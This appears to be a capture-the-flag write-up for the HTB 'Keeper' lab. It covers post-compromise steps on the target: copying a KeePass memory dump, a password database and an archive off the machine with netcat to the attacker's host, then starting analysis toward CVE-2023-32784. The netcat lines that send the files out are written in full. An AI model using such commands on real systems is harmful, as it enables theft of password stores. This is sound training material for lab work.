KeePass
By far, there’s been mentions of the KeePass crash dump from multiple sources, including the ticket in the web application, which is linked to the mail system and PEAS detecting it
lnorgaard@keeper:~$ ll
total 332868
drwxr-xr-x 5 lnorgaard lnorgaard 4096 aug 14 16:29 ./
drwxr-xr-x 3 root root 4096 may 24 16:09 ../
lrwxrwxrwx 1 root root 9 may 24 15:55 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard 220 may 23 14:43 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard 3771 may 23 14:43 .bashrc
drwx------ 2 lnorgaard lnorgaard 4096 may 24 16:09 .cache/
drwx------ 3 lnorgaard lnorgaard 4096 aug 14 16:41 .gnupg/
-rwxr-x--- 1 lnorgaard lnorgaard 253395188 may 24 12:51 KeePassDumpFull.dmp*
-rw-rw-r-- 1 lnorgaard lnorgaard 31 aug 13 00:40 KeePassStrings
-rw------- 1 lnorgaard lnorgaard 20 aug 14 02:22 .lesshst
-rwxr-x--- 1 lnorgaard lnorgaard 3630 may 24 12:51 passcodes.kdbx*
-rw------- 1 lnorgaard lnorgaard 807 may 23 14:43 .profile
-rw------- 1 lnorgaard lnorgaard 5 aug 13 00:41 .python_history
-rw-r--r-- 1 root root 87391651 aug 14 16:44 RT30000.zip
drwx------ 2 lnorgaard lnorgaard 4096 jul 24 10:25 .ssh/
-rw-r----- 1 root lnorgaard 33 aug 10 20:09 user.txt
-rw-r--r-- 1 root root 39 jul 20 19:03 .vimrcChecking the home directory of the lnorgaard user reveals a few interesting files
Those are KeePassDumpFull.dmp, passcodes.kdbx and RT30000.zip
I will transfer them all to Kali to run analysis locally
lnorgaard@keeper:~$ cat KeePassStrings
Please ask your administrator.There is also the text file, KeePassStrings, which doesn’t reveal anything
RT30000.zip
lnorgaard@keeper:~$ md5sum ./RT30000.zip
c29f90dbb88d42ad2d38db2cb81eed21 ./RT30000.zip
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < RT30000.zip
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > RT30000.zip
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 41504
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./RT30000.zip
c29f90dbb88d42ad2d38db2cb81eed21 ./RT30000.zipTransferring the RT30000.zip file to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file RT30000.zip
RT30000.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ 7z l RT30000.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz (806D1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 87391651 bytes (84 MiB)
Listing archive: RT30000.zip
--
Path = RT30000.zip
Type = zip
Physical Size = 87391651
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2023-05-24 12:51:31 ..... 253395188 87387677 KeePassDumpFull.dmp
2023-05-24 12:51:11 ..... 3630 3630 passcodes.kdbx
------------------- ----- ------------ ------------ ------------------------
2023-05-24 12:51:31 253398818 87391307 2 filesThe RT30000.zip file is the archive that contains both KeePassDumpFull.dmp and passcodes.kdbx
This must be the attachment that the root user put in the mail.
passcodes.kdbx
lnorgaard@keeper:~$ md5sum ./passcodes.kdbx
524564c6269378457e8101b74b4b2b2a ./passcodes.kdbx
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < passcodes.kdbx
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > passcodes.kdbx
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 38188
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./passcodes.kdbx
524564c6269378457e8101b74b4b2b2a ./passcodes.kdbxTransferring the passcodes.kdbx file to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file passcodes.kdbx
passcodes.kdbx: Keepass password database 2.x KDBXThe passcodes.kdbx file is a password database file for KeePass
Interesting thing is that it uses the version 2.x, which might suggest a specific vulnerability
The DB itself is locked with password
KeePassDumpFull.dmp
lnorgaard@keeper:~$ md5sum ./KeePassDumpFull.dmp
8899ee7c8b17da8716a89580b39194d3 ./KeePassDumpFull.dmp
lnorgaard@keeper:~$ nc 10.10.14.20 2222 < KeePassDumpFull.dmp
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ nnc 2222 > KeePassDumpFull.dmp
listening on [any] 2222 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.227] 58210
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ md5sum ./KeePassDumpFull.dmp
8899ee7c8b17da8716a89580b39194d3 ./KeePassDumpFull.dmpTransferring the KeePassDumpFull.dmp file to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ file KeePassDumpFull.dmp
KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 typeThe KeePassDumpFull.dmp file is a memory dump of KeePass process
┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ volatility imageinfo -f KeePassDumpFull.dmp -v
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : No suggestion (Instantiated with no profile)
AS Layer1 : FileAddressSpace (/home/kali/archive/htb/labs/keeper/KeePassDumpFull.dmp)
PAE type : No PAEUnfortunately, volatility wasn’t able to confirm the image profile
Looking it up online reveals an Exploit PoC regarding a [[Keeper_CVE-2023-32784#[CVE-2023-32784](https //nvd.nist.gov/vuln/detail/cve-2023-32784)|vulnerability]]